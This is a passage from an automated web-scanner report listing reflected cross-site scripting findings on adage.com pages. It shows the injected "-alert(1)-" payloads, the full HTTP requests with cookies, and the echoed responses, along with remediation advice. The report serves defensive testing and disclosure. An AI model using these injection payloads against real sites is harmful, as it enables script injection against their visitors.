//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.js";
hbx.dft=
...[SNIP]...

1.69. http://adage.com/css/style.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /css/style.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c1369"-alert(1)-"9ba2570b3e6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css/style.cssc1369"-alert(1)-"9ba2570b3e6?1314816038 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:10:49 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=9AB4972EC2EA092285A2E6874BB2EF8ADA12FA48; path=/
Set-Cookie: HMAC=09CC70A1868B8A6038E076787902DEDAA10DA461; path=/
Set-Cookie: HMAC=E745E080D7D5F6646934E0213D6781BD73F01693; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49449
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
0100u";hbx.gn="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1314816038";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/css/style.cssc1369"-alert(1)-"9ba2570b3e6"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.js";
hbx.dft="y";
hbx.e
...[SNIP]...

1.70. http://adage.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 14808"-alert(1)-"d35674d75f9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /favicon.ico14808"-alert(1)-"d35674d75f9 HTTP/1.1
Accept: */*
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (compatible; Google Desktop/5.9.1005.12335; http://desktop.google.com/)
Host: adage.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:12:00 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=30C2D1D39B1E1A15623774684483ACB979319AEA; path=/
Set-Cookie: HMAC=9CB6EA0A2A2E6597F6BA4794B8118BDE69EC7FE8; path=/
Set-Cookie: HMAC=7D093743476E6110F4B5FB973F4893EF30B218B2; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49498
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
;hbx.vpc="HBX0100u";hbx.gn="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/favicon.ico14808"-alert(1)-"d35674d75f9"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.js";
hbx.dft="y";
hbx.e
...[SNIP]...

1.71. http://adage.com/images/bin/image/rightrail/ad-age-app-devices.jpg [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /images/bin/image/rightrail/ad-age-app-devices.jpg

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cc155"-alert(1)-"1fcd7946afc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /imagescc155"-alert(1)-"1fcd7946afc/bin/image/rightrail/ad-age-app-devices.jpg?1309532605 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:12:09 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=D1600A412EE3734F5764E96EB6E90B6F09AC02F1; path=/
Set-Cookie: HMAC=4F21A9B8720E8582CB1E7902FC00DAB122129625; path=/
Set-Cookie: HMAC=944F7955165834E3D6690116D923DFBCBBE2C738; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49485
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
pc="HBX0100u";hbx.gn="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1309532605";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/imagescc155"-alert(1)-"1fcd7946afc/bin/image/rightrail/ad-age-app-devices.jpg"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="non
...[SNIP]...

1.72. http://adage.com/images/bin/image/rightrail/ad-age-app-devices.jpg [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /images/bin/image/rightrail/ad-age-app-devices.jpg

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4003f"-alert(1)-"5cfe03c22a7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/bin4003f"-alert(1)-"5cfe03c22a7/image/rightrail/ad-age-app-devices.jpg?1309532605 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:12:21 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=91FD1AF79E146A23EDF6ED5FD0E338F19DE67F34; path=/
Set-Cookie: HMAC=D705306BDEB23364E79EC9CF7B5E7E08996A3643; path=/
Set-Cookie: HMAC=2DF24F40CB33DB4F878AD1ECC6001603CA9C5CEA; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49485
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
HBX0100u";hbx.gn="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1309532605";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/images/bin4003f"-alert(1)-"5cfe03c22a7/image/rightrail/ad-age-app-devices.jpg"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";

...[SNIP]...

1.73. http://adage.com/images/bin/image/rightrail/ad-age-app-devices.jpg [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /images/bin/image/rightrail/ad-age-app-devices.jpg

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d6f08"-alert(1)-"e00607392d2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/bin/imaged6f08"-alert(1)-"e00607392d2/rightrail/ad-age-app-devices.jpg?1309532605 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:12:28 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=8A3CEC8B4F57D60685B6EB9F6D9740F262E933B3; path=/
Set-Cookie: HMAC=12B37AD8FEEE3D18A06DEDE0FCD02E18AEC8EBE7; path=/
Set-Cookie: HMAC=37CF25731FE21FC42E68D8C0A70A5FD4A8959943; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49485
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
0u";hbx.gn="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1309532605";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/images/bin/imaged6f08"-alert(1)-"e00607392d2/rightrail/ad-age-app-devices.jpg"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dl
...[SNIP]...

1.74. http://adage.com/images/bin/image/rightrail/ad-age-app-devices.jpg [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /images/bin/image/rightrail/ad-age-app-devices.jpg

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 54ca4"-alert(1)-"9aba41bab09 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/bin/image/rightrail54ca4"-alert(1)-"9aba41bab09/ad-age-app-devices.jpg?1309532605 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:12:36 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=84EBDE8736920A4F9316C6B423740CF9A7BCBC5A; path=/
Set-Cookie: HMAC=B330E2C971BCC51A79A195555412E4A631E6DCF0; path=/
Set-Cookie: HMAC=BFBF99651C3F60D1294F22EFA5FFD48975E8D00F; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49485
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1309532605";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/images/bin/image/rightrail54ca4"-alert(1)-"9aba41bab09/ad-age-app-devices.jpg"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.
...[SNIP]...

1.75. http://adage.com/images/bin/image/rightrail/ad-age-app-devices.jpg [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /images/bin/image/rightrail/ad-age-app-devices.jpg

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7715a"-alert(1)-"74b81daadd4 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/bin/image/rightrail/ad-age-app-devices.jpg7715a"-alert(1)-"74b81daadd4?1309532605 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:12:43 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=D962C730C8F5B93EEFEF501FB6BF75EF25C9CA62; path=/
Set-Cookie: HMAC=E35BA1741C38D5F50344578118EF21F0F9FE27E2; path=/
Set-Cookie: HMAC=83DC096C6BF4F9C2D4FA52647EBFADD473075713; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49485
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
;

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1309532605";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/images/bin/image/rightrail/ad-age-app-devices.jpg7715a"-alert(1)-"74b81daadd4"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.js";
hbx.dft="y";
hbx.e
...[SNIP]...

1.76. http://adage.com/images/bin/image/rightrail/digitalalist-022811-rr.jpg [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /images/bin/image/rightrail/digitalalist-022811-rr.jpg

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 59e74"-alert(1)-"da314f30353 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images59e74"-alert(1)-"da314f30353/bin/image/rightrail/digitalalist-022811-rr.jpg?1298844621 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:12:08 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=DEB901EBF20FE647C99004393B14D3BF8A7C4373; path=/
Set-Cookie: HMAC=119F8377334A07E5F1AD7B795CFD1B710263D983; path=/
Set-Cookie: HMAC=6492A177801A39DD6C76B13636BA62B46638A44D; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49489
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
pc="HBX0100u";hbx.gn="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1298844621";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/images59e74"-alert(1)-"da314f30353/bin/image/rightrail/digitalalist-022811-rr.jpg"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt=
...[SNIP]...

1.77. http://adage.com/images/bin/image/rightrail/digitalalist-022811-rr.jpg [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /images/bin/image/rightrail/digitalalist-022811-rr.jpg

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2c816"-alert(1)-"25cc12a59a2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/bin2c816"-alert(1)-"25cc12a59a2/image/rightrail/digitalalist-022811-rr.jpg?1298844621 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:12:19 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=EB26C218D8E10BC0C4EA41070883EDFE1C9192DF; path=/
Set-Cookie: HMAC=7267AB09C3AD0356297297BD3D54B022C6826E12; path=/
Set-Cookie: HMAC=730FA87D4D2CB0AFB5B542705026EE1ED4154908; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49489
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
HBX0100u";hbx.gn="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1298844621";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/images/bin2c816"-alert(1)-"25cc12a59a2/image/rightrail/digitalalist-022811-rr.jpg"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="non
...[SNIP]...

1.78. http://adage.com/images/bin/image/rightrail/digitalalist-022811-rr.jpg [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /images/bin/image/rightrail/digitalalist-022811-rr.jpg

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3f7d1"-alert(1)-"0f37756a12 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/bin/image3f7d1"-alert(1)-"0f37756a12/rightrail/digitalalist-022811-rr.jpg?1298844621 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:12:28 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=FDC2745FA810E034250CB0FC6DE789D68C364EC7; path=/
Set-Cookie: HMAC=A280A41E31EA839D99BD7E6E0F223444AD929637; path=/
Set-Cookie: HMAC=6422D7EA191270A28126C15D80DA36C0CDC5863E; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49488
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
0u";hbx.gn="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1298844621";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/images/bin/image3f7d1"-alert(1)-"0f37756a12/rightrail/digitalalist-022811-rr.jpg"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hb
...[SNIP]...

1.79. http://adage.com/images/bin/image/rightrail/digitalalist-022811-rr.jpg [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /images/bin/image/rightrail/digitalalist-022811-rr.jpg

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4fff7"-alert(1)-"3fade222f3c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/bin/image/rightrail4fff7"-alert(1)-"3fade222f3c/digitalalist-022811-rr.jpg?1298844621 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:12:36 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
